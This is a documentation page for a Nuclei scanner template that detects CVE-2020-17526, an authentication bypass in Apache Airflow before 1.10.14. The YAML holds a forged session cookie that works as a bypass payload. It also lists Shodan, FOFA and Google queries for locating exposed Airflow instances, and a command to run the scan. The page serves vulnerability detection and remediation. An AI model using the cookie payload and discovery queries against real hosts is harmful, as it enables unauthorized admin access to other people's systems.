Skip to content
Nuclei Templates

Apache Airflow <1.10.14 - Authentication Bypass

ID: CVE-2020-17526

Severity: high

Author: piyushchhiroliya

Tags: cve,cve2020,apache,airflow,auth-bypass

Description

Section titled “Description”

Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.

YAML Source

Section titled “YAML Source”
id: CVE-2020-17526


info:
  name: Apache Airflow <1.10.14 - Authentication Bypass
  author: piyushchhiroliya
  severity: high
  description: |
    Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code.
  remediation: Change default value for [webserver] secret_key config.
  reference:
    - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
    - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
    - http://www.openwall.com/lists/oss-security/2020/12/21/1
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17526
    - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2020-17526
    cwe-id: CWE-287
    epss-score: 0.06442
    epss-percentile: 0.9369
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: airflow
    shodan-query:
      - http.title:"airflow - dags" || http.html:"apache airflow"
      - http.title:"sign in - airflow"
      - product:"redis"
    fofa-query:
      - Apache Airflow
      - apache airflow
      - title="airflow - dags" || http.html:"apache airflow"
      - title="sign in - airflow"
    google-query:
      - intitle:"sign in - airflow"
      - intitle:"airflow - dags" || http.html:"apache airflow"
  tags: cve,cve2020,apache,airflow,auth-bypass


http:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Redirecting...')"
          - "status_code_1 == 302"
        condition: and


      - type: word
        part: body_2
        words:
          - "DAG"
          - "Recent Tasks"
          - "Users"
          - "SLA Misses"
          - "Task Instances"
        condition: and
# digest: 490a0046304402200db9ad18f7efac2a1fcab306074ed5367ebe2fc8588b242b1de6e6c368e7117a02200e66fb00b49c263c06ba81f8489ed44ffb47e80ca218cb7c0e1453f59b5f72be:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17526.yaml"

View on Github